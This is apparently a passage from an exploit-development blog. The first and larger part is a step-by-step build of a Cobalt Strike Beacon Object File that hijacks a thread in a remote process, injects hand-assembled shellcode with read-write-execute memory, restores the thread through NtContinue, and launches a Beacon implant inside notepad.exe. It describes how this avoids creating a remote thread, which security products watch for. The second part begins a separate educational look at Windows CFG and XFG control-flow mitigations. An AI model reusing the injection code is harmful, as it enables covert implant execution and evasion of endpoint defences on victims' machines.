In accordance with out plan, let’s end the CreateThread routine with a 0xc3 opcode, which is a return instruction.

// Return to the caller in order to kick off NtContinue routine
createThread[z++] = 0xc3;

Let’s continue by developing a NtContinue shellcode routine. After that, we will develop a stack alignment shellcode in order to ensure the stack pointer is 16-byte aligned, when the first call occurs in our final payload. Once we have completed both of these routines, we will walk through the entire shellcode inside of the debugger.

“Never in the Field of Human Conflict, Was So Much Owed, by So Many, to NtContinue

Up until now, we have achieved the following:

  1. Our shellcode has been injected into the remote process.
  2. We have identified a remote thread, which we will later manipulate to execute our Beacon implant
  3. We have created a routine that will place the Beacon implant in its own local thread, within the remote process, upon execution

This is great, and we are almost home free. The issue remains, however, the topic of thread restoration. After all, we are taking a thread, which was performing some sort of action before, unbeknownst to us, and forcing it to do something else. This will certainly result in execution of our shellcode, however, it will also present some unintended consequences. Upon executing our shellcode, the thread’s CPU registers, along with other information, will be out of context from the actions it was performing before execution. This will cause the the process housing this thread, the desired remote process we are injecting into, to most likely crash. To avoid this, we can utilize an undocumented ntdll.dll function, NtContinue. As pointed out in Alex Ionescu and Yarden Shafir’s R.I.P ROP: CET Internals in Windows 20H1 blog post, NtContinue is used to resume execution after an exception or interrupt. This is perfect for our use case, as we can abuse this functionality. Since our thread will be mangled, calling this function with the preserved CONTEXT record from earlier will restore execution properly. NtContinue accepts a pointer to a CONTEXT record, and a parameter that allows a programmer to set if the Alerted state should be removed from the thread, as outlined in its function prototype. We need not worry about the second parameter for our purposes, as we will set this parameter to FALSE. However, there remains the issue of the first parameter, PCONTEXT.

As you can recall in the former portion of this blog post, we first preserved the CONTEXT record for our hijacked thread, within our BOF code. The issue we have, however, is that this CONTEXT record is sitting within the current process, while our shellcode will be executed within the desired remote process. Because of the fact each user mode process has its own private address space, this CONTEXT record’s address is not visible to the remote process we are injecting into. Additionally, since NtContinue does not accept a HANDLE parameter, it expects the thread it will resume execution for is the current calling thread, which will be in the remote process. This means we will need to embed the CONTEXT record into our final payload that will be injected into the remote process. Additionally, since NtContinue restores execution of the calling thread, this is why we need to embed an NtContinue shellcode into the final payload that will be placed into the remote process. That way, when the hijacked thread executes the NtContinue routine, restoration of the hijacked thread will occur, since it is the calling thread. With that said, let’s get into developing the routine.

Synonymous with our CreateThread routine, let’s create a 64-byte buffer and a new counter.

BYTE ntContinue[64] = { NULL };
int i = 0;

As mentioned earlier, this NtContinue routine is going to be the piece of code that actually invokes the CreateThread routine. When this NtContinue routine performs the call to the CreateThread routine, it will push a return address on the stack, which will be the next instruction within this NtContinue shellcode. When the CreateThread shellcode performs its return, execution will pick back up inside of the NtContinue shellcode. With this in mind, let’s start by using a near call, which uses relative addressing, to call the CreateThread shellcode.

The first goal is to start off the NtContinue routine with a call to the CreateThread routine. To do this, we first need to calculate the distance from this call instruction to the location of the CreateThread shellcode. In order to properly do this, we need to take one thing into consideration, and that is we need to also carry the preserved CONTEXT record with us, for use, in the NtContinue call. To do this, we will use a near call procedure. Near calls, in assembly, do not call an absolute address, like the address of a Windows API function, for instance. Instead, near call instructions can be used to call a function, relative to the address in the instruction pointer. Essentially, if we can calculate the distance, in a DWORD, to the CreateThread routine, we can just invoke the opcode 0xe8, along with a DWORD to represent the distance from the current memory location, in order to dynamically call the CreateThread routine! The reason we are using a DWORD, which is a 32-bit value, is because the x86 instruction set, which is usable by 64-bit systems, allows either a 16-bit or 32-bit relative virtual address (RVA). However, this 32-bit value is sign extended to a 64-bit value on 64-bit systems. More information on the different calling mechanisms on x86_64 systems can be found here. The offset to our shellcode will be the size of our NtContinue routine plus the size of a CONTEXT record. This essentially will “jump over” the NtContinue code and the CONTEXT record, in order to first execute the CreatThread routine. The corresponding instructions we need, are as follows.

// First calculate the size of a CONTEXT record and NtContinue routine
// Then, "jump over shellcode" by calling the buffer at an offset of the calculation (64 bytes + CONTEXT size)

// 0xe8 is a near call, which uses RIP as the base address for RVA calculations and dynamically adds the offset specified by shellcodeOffset
ntContinue[i++] = 0xe8;

// Subtracting to compensate for the near call opcode (represented by i) and the DWORD used for relative addressing
DWORD shellcodeOffset = sizeof(ntContinue) + sizeof(CONTEXT) - sizeof(DWORD) - i;
mycopy(ntContinue + i, &shellcodeOffset, sizeof(shellcodeOffset));

// Update counter with location buffer can be written to
i += sizeof(shellcodeOffset);

Although the above code practically represents what was said about, you can see that the size of a DWORD and the value of i are subtracted from the offset previously mentioned. This is because, the whole NtContinue routine is 64 bytes. By the time the code has finished executing the entire call instruction, a few things will have happened. The first being, the call instruction itself, 0xe8, will have been executed. This takes us from being at the beginning of our routine, byte 1/64, to the second byte in our routine, byte 2/64. The CreateThread routine, which we need to call, is now one byte closer than when we started - and this will affect our calculations. In the above set of instructions, this byte has been compensated for, by subtracting the already executed opcode (the current value of i). Additionally, four bytes are taken up by the actuall offset itself, aDWORD, which is a 4 byte value. This means execution will now be at byte 5/64 (one byte for the opcode and four bytes for the DWORD). To compensate for this, the size of a DWORD has been subtracted from the total offset. If you think about it, this makes sense. By the time the call has finished executing, the CreateThread routine will be five bytes closer. If we used the original offset, we would have overshot the CreateThread routine by five bytes. Additionally, we update the i counter variable to let it know how many bytes we have written to the overall NtContinue routine. We will walk through all of these instructions inside of the debugger, once we have finished developing this small shellcode routine.

At this point, the NtContinue routine would have called the CreateThread routine. The CreateThread routine would have returned execution back to the NtContinue routine, and the next instructions in the NtContinue routine would execute.

The next few instructions are a bit of a “hacky” method to pass the first parameter, a pointer to our CONTEXT record, to the NtContinue function. We will use a call/pop routine, which is a very documented method and can be read about here and here. As we know, we are required to place the first value, for our purposes, into the RCX register - per the __fastcall calling convention. This means we need to calculate the address of the CONTEXT record somehow. To do this, we actually use another near call instruction in order to call the immediate byte after the call instruction.

// Near call instruction to call the address directly after, which is used to pop the pushed return address onto the stack with a RVA from the same page (call pushes return address onto the stack)
ntContinue[i++] = 0xe8;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;
ntContinue[i++] = 0x00;

The instruction this call will execute is the immediate next instruction to be executed, which will be a pop rcx instruction added by us. Additionally the value of i at this point is saved into a new variable called contextOffset.

// The previous call instruction pushes a return address onto the stack
// The return address will be the address, in memory, of the upcoming pop rcx instruction
// Since current execution is no longer at the beginning of the ntContinue routine, the distance to the CONTEXT record is no longer 64-bytes
// The address of the pop rcx instruction will be used as the base for RVA calculations to determine the distance between the value in RCX (which will be the address of the 'pop rcx' instruction) to the CONTEXT record
// Obtaining the current amount of bytes executed thus far
int contextOffset = i;

// __fastcall calling convention
// NtContinue requires a pointer to a context record and an alert state (FALSE in this case)
// pop rcx (get return address, which isn't needed for anything, into RCX for RVA calculations)
ntContinue[i++] = 0x59;

The purpose of this, is the call instruction will push the address of the pop rcx instruction onto the stack. This is the return address of this function. Since the next instruction directly after the call is pop rcx, it will place the value at RSP, which is now the address of the pop rcx instruction due to call POP_RCX_INSTRUCTION pushing it onto the stack, into the RCX register. This helps us, as now we have a memory address that is relatively close the the CONTEXT record, which will be located directly after the call to NtContinue.

Now, as we know, the original offset of the CONTEXT record from the very beginning of the entire NtContinue routine was 64-bytes. This is because we will copy the CONTEXT record directly after the 64-byte BYTE array, ntContinue, in our final buffer. Right now however, if we add 64-bytes, however, to the value in RCX, we will overshoot the CONTEXT record’s address. This is because we have executed quite a few instructions of the 64-byte shellcode, meaning we are now closer to the CONTEXT record, than we where when we started. To compensate for this, we can add the original 64-byte offset to the RCX register, and then subtract the contextOffset value, which represents the total amount of opcodes executed up until that point. This will give us the correct distance from our current location to the CONTEXT record.

// The address of the pop rcx instruction is now in RCX
// Adding the distance between the CONTEXT record and the current address in RCX
// add rcx, distance to CONTEXT record
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x83;
ntContinue[i++] = 0xc1;

// Value to be added to RCX
// The distance between the value in RCX (address of the 'pop rcx' instruction) and the CONTEXT record can be found by subtracting the amount of bytes executed up until the 'pop rcx' instruction and the original 64-byte offset
ntContinue[i++] = sizeof(ntContinue) - contextOffset;

This will place the address of the CONTEXT record into the RCX register. If this doesn’t compute, don’t worry. In a brief moment, we will step through everything inside of WinDbg to visually put things together.

The next goal is to set the RaiseAlert function argument to FALSE, which is a value of 0. To do this, again, we will use bitwise XOR.

// xor rdx, rdx
// Set to FALSE
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x31;
ntContinue[i++] = 0xd2;

All that is left now is to call NtContinue! Again, just like our call to CreateThread, we can resolve the address of the API inside of the current process and pass the return value to the remote process, as even though each process is mapped its own Windows DLLs, the addresses are the same across the system.

The mov rax instruction set is first.

// Place NtContinue into RAX
ntContinue[i++] = 0x48;
ntContinue[i++] = 0xb8;

We then resolve the address of NtContinue, Beacon Object File style.

// Although the thread is in a remote process, the Windows DLLs mapped to the Beacon process, although private, will correlate to the same virtual address
unsigned long long ntcontinueAddress = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("ntdll"), "NtContinue");

// Error handling. If NtContinue cannot be resolved, abort
if (ntcontinueAddress == NULL)
{
	BeaconPrintf(CALLBACK_ERROR, "Error! Unable to resolve NtContinue.\n", KERNEL32$GetLastError());
}

Using the custom mycopy function, we then can copy the address of NtContinue at the correct index within the BYTE array, based on the value of i.

// Copy the address of NtContinue function address to the NtContinue routine buffer
mycopy(ntContinue + i, &ntcontinueAddress, sizeof(ntcontinueAddress));

// Update the counter with the correct offset the next bytes should be written to
i += sizeof(ntcontinueAddress);

At this point, things are as easy as just allocating some stack space for good measure and calling the value in RAX, NtContinue!

// Allocate some space on the stack for the call to NtContinue
// sub rsp, 0x20
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x83;
ntContinue[i++] = 0xec;
ntContinue[i++] = 0x20;

// call NtContinue
ntContinue[i++] = 0xff;
ntContinue[i++] = 0xd0;

All there is left now is the stack alignment routine inside of the call to CreateThread! This alignment is to ensure the stack pointer is 16-byte aligned when the call from the NtContinue routine invokes the CreateThread routine.

Will The Stars Align?

The following routine will perform bitwise AND with the stack pointer, to ensure a 16-byte aligned RSP value inside of the CreateThread routine, by clearing out the last 4 bits of the address.

// Create 4 byte buffer to perform bitwise AND with RSP to ensure 16-byte aligned stack for the call to shellcode
// and rsp, 0FFFFFFFFFFFFFFF0
stackAlignment[0] = 0x48;
stackAlignment[1] = 0x83;
stackAlignment[2] = 0xe4;
stackAlignment[3] = 0xf0;

After the stack alignment is completed, all there is left to do is invoke malloc to create a large buffer that will contain all of our custom routines, inject the final buffer, and call SetThreadContext and ResumeThread to queue execution!

// Allocating memory for final buffer
// Size of NtContinue routine, CONTEXT structure, stack alignment routine, and CreateThread routine
PVOID shellcodeFinal = (PVOID)MSVCRT$malloc(sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread));

// Copy NtContinue routine to final buffer
mycopy(shellcodeFinal, ntContinue, sizeof(ntContinue));

// Copying CONTEXT structure, stack alignment routine, and CreateThread routine to the final buffer
// Allocation is already a pointer (PVOID) - casting to a DWORD64 type, a 64-bit address, in order to write to the buffer at a desired offset
// Using RtlMoveMemory for the CONTEXT structure to avoid casting to something other than a CONTEXT structure
NTDLL$RtlMoveMemory((DWORD64)shellcodeFinal + sizeof(ntContinue), &cpuRegisters, sizeof(CONTEXT));
mycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT), stackAlignment, sizeof(stackAlignment));
mycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment), createThread, sizeof(createThread));

// Declare a variable to represent the final length
int finalLength = (int)sizeof(ntContinue) + (int)sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread);

Before moving on, notice the call to RtlMoveMemory when it comes to copying the CONTEXT record to the buffer. This is due to mycopy being prototyped to access the source and destination buffers aschar* data types. However, RtlMoveMemory is prototyped to accept data types of VOID UNALIGNED, which indicates pretty much any data type can be used, which is perfect for us as CONTEXT is a structure, not a char*.

The above code creates a buffer with the size of our routines, and copies it into the routine at the correct offsets, with the NtContinue routine being copied first, followed by the preserved CONTEXT record of the hijacked thread, the stack alignment routine, and the CreateThread routine. After this, the shellcode is injected into the remote process.

First, VirtualAllocEx is called again.

// Inject the shellcode into the target process with read/write permissions
PVOID allocateMemory = KERNEL32$VirtualAllocEx(
	processHandle,
	NULL,
	finalLength,
	MEM_RESERVE | MEM_COMMIT,
	PAGE_EXECUTE_READWRITE
);

if (allocateMemory == NULL)
{
	BeaconPrintf(CALLBACK_ERROR, "Error! Unable to allocate memory in the remote process. Error: 0x%lx\n", KERNEL32$GetLastError());
}

Secondly, WriteProcessMemory is called to write the shellcode to the allocation.

// Write shellcode to the new allocation
BOOL writeMemory = KERNEL32$WriteProcessMemory(
	processHandle,
	allocateMemory,
	shellcodeFinal,
	finalLength,
	NULL
);

if (!writeMemory)
{
	BeaconPrintf(CALLBACK_ERROR, "Error! Unable to write memory to the buffer. Error: 0x%llx\n", KERNEL32$GetLastError());
}

After that, RSP and RIP are set before the call to SetThreadContext. RIP will point to our final buffer and upon thread restoration, the value in RIP will be executed.

// Allocate stack space by subtracting the stack by 0x2000 bytes
cpuRegisters.Rsp -= 0x2000;

// Change RIP to point to our shellcode and typecast buffer to a DWORD64 because that is what a CONTEXT structure uses
cpuRegisters.Rip = (DWORD64)allocateMemory;

Notice that RSP is subtracted by 0x2000 bytes. @zerosum0x0’s blog post on ThreadContinue adopts this feature, to allow breathing room on the stack in order for code to execute, and I decided to adopt it as well in order to avoid heavy troubleshooting.

After that, all there is left to do is to invoke SetThreadContext, ResumeThread, and free!

SetThreadContext

// Set RIP
BOOL setRip = KERNEL32$SetThreadContext(
	desiredThread,
	&cpuRegisters
);

// Error handling
if (!setRip)
{
	BeaconPrintf(CALLBACK_ERROR, "Error! Unable to set the target thread's RIP register. Error: 0x%lx\n", KERNEL32$GetLastError());
}

ResumeThread

// Call to ResumeThread()
DWORD resume = KERNEL32$ResumeThread(
	desiredThread
);

free

// Free the buffer used for the whole payload
MSVCRT$free(
	shellcodeFinal
);

Additionally, you should always clean up handles in your code - but especially in Beacon Object Files, as they are “sensitive”.

// Close handle
KERNEL32$CloseHandle(
	desiredThread
);
// Close handle
KERNEL32$CloseHandle(
processHandle
);

Debugger Time

Let’s use an instance of notepad.exe as our target process and attach it in WinDbg.

The PID we want to inject into is 7548 for our purposes. After loading our Aggressor Script developed earlier, we can use the command cThreadHijack 7548 TESTING, where TESTING is the name of the HTTP listener Beacon will interact with.

There we go, our BOF successfully ran. Now, let’s examine what we are working with in WinDbg. As we can see, the address of our final buffer is shown in the Current RIP: 0x1f027f20000 output line. Let’s view this in WinDbg.

Great! Everything seems to be in place. As is shown in the mov rax,offset ntdll!NtContinue instruction, we can see our NtContinue routine. The beginning of the NtContinue routine should call the address of the stack alignment and CreateThread shellcode, as mentioned earlier in this blog post. Let’s see what the address 0x000001f027f20510 references, which is the memory address being called.

Perfect! As we can see by the and rsp, 0FFFFFFFFFFFFFFFF0 instruction, along with the address of KERNEL32!CreateThreadStub, the NtContinue routine will first call the stack alignment and CreateThread routines. In this case, we are good to go! Let’s start now walking through execution of the code.

Upon SetThreadContext being invoked, which changes the RIP register to execute our shellcode, we can see that execution has reached the first call, which will invoke the stack alignment and CreateThread routines. Stepping through this call, as we know, will push a return address onto the stack. As mentioned previously, this will be the address of that next call 0x000001f027f2000a instruction. When the CreateThread routine returns, it will return to this address. After stepping through the instruction, we can see that the address of the next call is pushed onto the stack.

Execution then reaches the bitwise AND instruction. As we can see from the above image, and rsp, 0FFFFFFFFFFFFFFF0 is redundant, as the stack pointer is already 16-byte aligned (the last 4 bits are already set to 0). Stepping through the bitwise XOR operations, RCX and RDX are set to 0.

As we know from the CreateThread prototype, the lpStartAddress parameter is a pointer to our shellcode. Looking at the above image, we can see the third argument, which will be loaded into R8, is 0x1f027ee0000. Unassembling this address in the debugger discloses this is our Beacon implant, which was injected earlier! TO verify this, you can generate a raw Beacon stageless artifact in Cobalt Strike manually and run it through hexdump to verify the first few opcodes correspond.

After stepping through the instruction, the value is loaded into the R8 register. The next instruction sets R9 to 0 via xor r9, r9.

Additionally, [RSP + 0x20] and [RSP + 0x28] are set to 0, by copying the value of R9, which is now 0, to these locations. Here is what [RSP + 0x20] and [RSP + 0x28] look like before the mov [rsp + 0x20], r9 and mov [rsp + 0x28], r9 instructions and after.

After, CreateThread is placed into RAX and is called. Note CreateThread is actually CreateThreadStub. This is because most former kernel32.dll functions were placed in a DLL called KERNELBASE.DLL. These “stub” functions essentially just redirect execution to the correct KERNELBASE.dll function.

Stepping over the function, with p in WinDbg, places the CreateThread return value, into RAX - which is a handle to the local thread containing the Beacon implant.

After execution of our NtContinue routine is complete, we will receive the Beacon callback as a result of this thread.

Additionally, we can see that RSP is set to the first “real” instruction of our NtContinue routine. A ret instruction, which is what is in RIP currently, will take the stack pointer (RSP) and place it into RIP. Executing the return redirects execution back to the NtContinue routine.

As we can see in the image above, the next call instruction calls the pop rcx instruction. This call instruction, when executed, will push the address of the pop rcx instruction onto the stack, as a return address.

Executing the pop rcx instruction, we can see that RCX now contains the address, in memory, of the pop rcx instruction. This will be the base address used in the RVA calculations to resolve the address of the preserved CONTEXT record.

To verify if our offset is correct, we can use .cxr in WinDbg to divulge if the contiguous memory block located at RCX + 0x36 is in fact a CONTEXT record. 0x36 is chosen, as this is the value currently that is about to be added to RCX, as seen a few screenshots ago. Verifying with WinDbg, we can see this is the case.

If this would not have been the correct location of the CONTEXT record, this WinDbg extension would have failed, as the memory block would not have been parsed correctly.

Now that we have verified our CONTEXT record is in the correct place, we can perform the RVA calculation to add the correct distance to the CONTEXT record, meaning the pointer is then stored in RCX, fulfilling the PCONTEXT parameter of NtContinue.

Stepping through xor rdx, rdx, which sets the RaiseAlert parameter of NtContinue to FALSE, execution lands on the call rax instruction, which will call NtContinue.

Pressing g in the debugger then shows us quite a few of DLLs are mapped into notepad.exe.

This is the Beacon implant resolving needed DLLs for various function calls - meaning our Beacon implant has been executed! If we go back into Cobalt Strike, we can see we now have a Beacon in context of notepad.exe with the same PID of 7548!

Additionally, you will notice on the victim machine that notepad.exe is fully functional! We have successfully forced a remote thread to execute our payload and restored it, all in one go.

Final Thoughts

Obviously, this technique isn’t without its flaws. There are still IOCs for this technique, including invoking SetThreadContext, amongst other things. However, this does avoid invoking any sort of action that creates a remote thread, which is still useful in most situations. This technique could be taken further, perhaps with invoking direct system calls versus invoking these APIs, which are susceptible to hooking, with most EDR products.

Additionally, one thing to note is that since this technique suspends a thread and then resumes it, you may have to wait a few moments to even a few minutes, in order for the thread to get around to executing. Interacting with the process directly will force execution, but targeting Windows processes that perform execution often is a good target also to avoid long waits.

I had a lot of fun implementing this technique into a BOF and I am really glad I have a reason to write more C code! Like always: peace, love, and positivity :-).

Exploit Development: Between a Rock and a (Xtended Flow) Guard Place: Examining XFG

23 August 2020 at 00:00

Introduction

Previously, I have blogged about ROP and the benefits of understanding how it works. Not only is it a viable first-stage payload for obtaining native code execution, but it can also be leveraged for things like arbitrary read/write primitives and data-only attacks. Unfortunately, if your end goal is native code execution, there is a good chance you are going to need to overwrite a function pointer in order to hijack control flow. Taking this into consideration, Microsoft implemented Control Flow Guard, or CFG, as an optional update back in Windows 8.1. Although it was released before Windows 10, it did not really catch on in terms of “mainstream” exploitation until recent years.

After a few years, and a few bypasses along the way, Microsoft decided they needed a new Control Flow Integrity (CFI) solution- hence XFG, or Xtended Flow Guard. David Weston gave an overview of XFG at his talk at BlueHat Shanghai 2019, and it is pretty much the only public information we have at this time about XFG. This “finer-grained” CFI solution will be the subject of this blog post. A few things before we start about what this post is and what it isn’t:

  1. This post is not an “XFG internals” post. I don’t know every single low level detail about it.
  2. Don’t expect any bypasses from this post- this mitigation is still very new and not very explored.
  3. We will spend a bit of time understanding what indirect function calls are via function pointers, what CFG is, and why XFG is a very, very nice mitigation (IMO).

This is simply going to be an “organized brain dump” and isn’t meant to be a “learn everything you need to know about XFG in one sitting” post. This is just simply documenting what I have learned after messing around with XFG for a while now.

The Blueprint for XFG: CFG

CFG is a pretty well documented exploit mitigation, and I have done my fair share of documenting it as well. However, for completeness sake, let’s talk about how CFG works and its potential shortcomings.

Note that before we begin, Microsoft deserves recognition for being one of the leaders in implementing a Control Flow Integrity (CFI) initiative and among the first to actually release a CFI solution.

Firstly, to enable CFG, a program is compiled and linked with the /guard:cf flag. This can be done through the Microsoft Visual Studio tool cl (which we will look at later). However, more easily, this can be done by opening Visual Studio and navigating to Project -> Properties -> C/C++ -> Code Generation and setting Control Flow Guard to Yes (/guard:cf)

CFG at this point would now be enabled for the program- or in the case of Microsoft binaries, they would already be CFG enabled (most of them). This causes a bitmap to be created, which essentially is made up of all functions within the process space that are “protected by CFG”. Then, before an indirect function call is made (we will explore what an indirect call is shortly if you are not familiar), the function being called is sent to a special CFG function. This function checks to make sure that the function being called is a part of the CFG bitmap. If it is, the call goes through. If it isn’t, the call fails.

Since this is a post about XFG, not CFG, we will skip over the technical details of CFG. However, if you are interested to see how CFG works at a lower level, Morten Schenk has an excellent post about its implementation in user mode (the Windows kernel has been compiled with CFG, known as kCFG, since Windows 10 1703. Note that Virtualization-Base Security, or VBS, is required for kCFG to be enforced. However, even when VBS is disabled, kCFG has some limited functionality. This is beyond the scope of this blog post).

Moving on, let’s examine how an indirect function call (e.g. call [rax] where RAX contains a function address or a function pointer), which initiates a control flow transfer to a different part of an application, looks without CFG or XFG. To do this, let’s take a look at a very simple program that performs a control flow transfer.

Note that you will need Microsoft Visual Studio 2019 Preview 16.5 or greater in order to follow along.

Let’s talk about what is happening here. Firstly, this code is intentionally written this way and is obviously not the most efficient way to do this. However, it is done this way to help simulate a function pointer overwrite and the benefits of XFG/CFG.

Firstly, we have a function called void cfgTest() that just prints a sentence. This function is then assigned to a function pointer called void (*cfgTest1), which actually is an array. Then, in the main() function, the function pointer void (*cfgTest1) is executed. Since void (*cfgtest1) is pointing to void cfgTest(), this will actually just cause void (*cfgtest1) to just execute void cfgTest(). This will create a control flow transfer, as the main() function will perform a call to the void (*cfgTest1) function, which will then call the void cfgTest() function.

To compile with the command line tool cl, type in “x64 Native Tools Command Prompt for VS 2019 Preview” in the Start menu and run the program as an administrator.

This will drop you into a special Command Prompt. From here, you will need to navigate to the installation path of Visual Studio, and you will be able to use the cl tool for compilation.

Let’s compile our program now!

The above command essentially compiles the program with the /Zi flag and the /INCREMENTAL:NO linking option. Per Microsoft Docs, /Zi is used to create a .pdb file for symbols (which will be useful to us). /INCREMENTAL:NO has been set to instruct cl not to use the incremental linker. This is because the incremental linker is essentially used for optimization, which can create things like jump thunks. Jump thunks are essentially small functions that only perform a jump to another function. An example would be, instead of call function1, the program would actuall perform a call j_function1. j_function1 would simply be a function that performs a jmp function1 instruction. This functionality will be turned off for brevity. Since our “dummy program” is so simple, it will be optimized very easily. Knowing this, we are disabling incremental linking in order to simulate a “Release” build (we are currently building “Debug” builds) of an application, where incremental linking would be disabled by default. However, none of this is really prevalent here- just a point of contention to the reader. Just know we are doing it for our purposes.

The result of the compilation command will place the output file, named Source.exe in this case, into the current directory along with a symbol file (.pdb). Now, we can open this application in IDA (you’ll need to run IDA as an administrator, as the application is in a privileged directory). Let’s take a look at the main() function.

Let’s examine the assembly above. The above function loads the void (*cfgTest1) function pointer into RCX. Since void (*cfgTest1) is a function pointer to an array, the value in RCX itself isn’t what is needed to jump to the array. Only when RCX is dereferenced in the call qword ptr [rcx+rax] instruction does program execution actually perform a control flow transfer to void (*cfgTest1)’s first index- which is void cfgTest(). This is why call qword ptr [rcx+rax] is being performed, as RAX is the position in the array that is being indexed.

Taking a look at the call instruction in IDA, we can see that clearly this will redirect program execution to void cfgTest().

Additionally, in WinDbg, we can see that Source!cfgTest1, which is a function, points to Source!cfgTest.

Nice! We know that our program will redirect execution from main() to void (*cfgTest1) and then to void cfgTest()! Let’s say as an attacker, we had an arbitrary write primitive and we were able to overwrite what void (*cfgTest1) points to. We could actually change where the application actually ends up calling! This is not good from a defensive perspective.

Can we mitigate this issue? Let’s go back and recompile our application with CFG this time and find out.

This time, we add /guard:cf as a flag, as well as a linking option.

Disassembling the main() function in IDA again, we notice things look a bit different.

Very interesting! Instead of making a call directly to void (*cfgTest1) this time, it seems as though the function __guard_disaptch_icall_fptr will be invoked. Let’s set a breakpoint in WinDbg on main() and see how this looks after invoking the CFG dispatch function.

After setting a breakpoint on the main() function, code execution hits the CFG dispatch function.

The CFG dispatch function then performs a dereference and jumps to ntdll!LdrpDispatchUserCallTarget.

We won’t get into the technical details about what happens here, as this post isn’t built around CFG and Morten’s blog already explains what will happen. But essentially, at a high level, this function will check the CFG bitmap for the Source.exe process and determine if the void cfgTest() function is a valid target (a.k.a if it’s in the bitmap). Obviously this function hasn’t been overwritten, so we should have no problems here. After stepping through the function, control flow should transfter back to the void cfgTest() function seamlessly.

Execution has returned back to the void cfgTest() function. Additionally what is nice, is the lack of overhead that CFG put on the program itself. The check was very quick because Microsoft opted to use a bitmap instead of indexing an array or some other structure.

You can also see what functions are protected by the CFG bitmap by using the dumpbin tool within the Visual Studio installation directory and the special Visual Studio Command Prompt. You can use the command dumpbin /loadconfig APPLICATION.exe to view this.

Let’s see if we can take this even further and potentially show why XFG is defintley a better/more viable option than CFG.

CFG: Potential Shortcomings

As mentioned earlier, CFG checks functions to make sure they are part of the “CFG bitmap” (a.k.a protected by CFG). This means a few things from an adversarial perspective. If we were to use VirtualAlloc() to allocate some virtual memory, and overwrite a function pointer that is protected by CFG with the returned address of the allocation- CFG would make the program crash.

Why? VirtualAlloc() (for instance) would return a virtual address of something like 0xdb0000. When the application in question was compiled with CFG, obviously this memory address wasn’t a part of the application. Therefore, this address wouldn’t be “protected by CFG” and the program would crash. However, this is not very practical. Let’s think about what an adversary tries to accompish with ROP.

Adversaries want to return into a Windows API function like VirtualProtect() in order to dynamically change permissions of memory. What is interesting about CFG is that in addition to the program’s functions, all exported Windows functions that make up the “module” import list for a program can be called. For instance, the application we are looking at is called Source.exe Dumping the loaded modules for the application, we can see that KERNELBASE.dll, kernel32.dll, and ntdll.dll (which are the usual suspects) are loaded for this application.

Let’s see if/how this could be abused!

Let’s firstly update our program with a new function.

This program works exactly as the program before, except the function void protectMe2() is added in to add another user defined function to the CFG bitmap. Note that this function will never be executed, and that is poor from a programmer’s perspective. However, this function’s sole purpose is to just show another protected function. This can be verified again with dumpbin.

Here, we can see that Source!cfgTest1 still points to Source!cfgTest

Let’s recall what was said earlier about how CFG only validates if a function resides within the CFG bitmap or not. Let’s now perform a simulated arbitrary write condition in WinDbg to overwrite what Source!cfgTest points to, with Source!protectMe2.

The above command uses x to show the address of the Source!protectMe2 function and then uses dps to show that Source!cfgTest1 still points to Source!cfgTest1. Then, using ep, we overwrite the function pointer. dps once again verifies that the function overwrite has occured.

Let’s now step through the program to see what happens. Program execution firstly hits the CFG dispatch function.

Looking at the RAX register, which is used to hold the address of the function CFG will check, we see it has been overwritten with Source!protectMe2 instead of Source!cfgTest.

Execution then hits ntdll!LdrpDispatchUserCallTarget. After walking the function, which validates if the in scope function resides within the CFG bitmap for the process, execution redirects to Source!protectMe2!

This is very interesting from an adversarial perspective, as we were successfully able to overwrite a function pointer and CFG didn’t terminate our process! The only caveat being that the function is a part of the current processes’s CFG bitmap.

What is even more interesting, is that function pointers protected by CFG can be overwritten by any exported function at runtime! Let’s rework this example, but try to call a Windows API function like KERNELBASE!WriteProcessMemory.

First, we simulate the arbitrary write by overwriting Source!cfgTest1 with KERNELBASE!WriteProcessMemory.

Program execution passes through Source!__guard_dispatch_icall_fptr and ntdll!LdrpDispatchUserCallTarget and we can clearly see execution returns to KERNELBASE!WriteProcessMemory.

This shows that even with CFG enabled, it is still possible to call functions that have overwritten other functions. This is not good, as calls can still be made with malign intent. Additionally, calling functions of different types out of context may result in a type confusion or other programmatic behavioral problems.

Now that we have armed ourselves with an understanding of why CFG is an amazing start to solving the CFI problem, but yet still contains many shortcomings, let’s get into XFG and what makes it better and different.

XFG: The Next Era of CFI for Windows

Let’s start out by talking about what XFG is at a high level. After we go through some high level details about XFG, we will compile our program with XFG and walk through the dispatch function(s), as well as perform some simulated function pointer overwrites to see how XFG reacts and additionally see how XFG differs from CFG.

My last CrowdStrike blog post touches on XFG, but not in too much detail. XFG essentially is a more “hardened” version of CFG. How so? XFG, at compile time, produces a “type-based hash” of a function that is going to be called in a control flow transfer. This hash will be placed 8 bytes above the target function, and will be compared against a preserved version of that hash when an XFG dispatch function is executed. If the hashes match, control flow transfer is then passed to the in scope function that was checked. If the hashes differ, the program crashes.

Let’s take a look a bit more at this. Firstly, let’s compile our program with XFG!

Note that you will need Visual Studio 2019 Preview + at least Windows 10 21H1 in order to use XFG. Additionally, XFG is not found in the GUI compilation options.

Using the /guard:xfg flag in compilation and linking, we can enable XFG for our application.

Notice that even though it was not selected, CFG is still enabled for our application.

Let’s crack open IDA again to see how the main() function looks with the addition of XFG.

Very interesting! Firstly, we can see that R10 takes in the value of the XFG “type-based” hash. Then, a call is performed to the XFG dispatch call __guard_xfg_dispatch_icall_fptr. Note that the hash has been deemed “immutable” by Microsoft and cannot be modified by an attacker, due to its read only state.

In the image, below, the location of the XFG hash is at 00007ff7ded4110c

We can see that this address is executable (obviously) and readable- with the ability to write disabled.

Additionally, you can use the dumpbin tool to print out the functions protected by CFG/XFG. Functions protected by XFG are denoted with an X

Before we move on, one interesting thing to note is that the XFG hash is already placed 8 bytes above an XFG protected function BEFORE any code execution actually occurs.

For instance, Source!cfgTest is an XFG protected function. 8 bytes above this function is the hash seen in the previous image, but with an additional bit set.

We will see why this additional bit has been set when we step through the functions that perform XFG checks.

Moving on, let’s step through this in WinDbg to see what we are working with here, and how execution flow will go.

Firstly, execution lands on the XFG dispatch function.

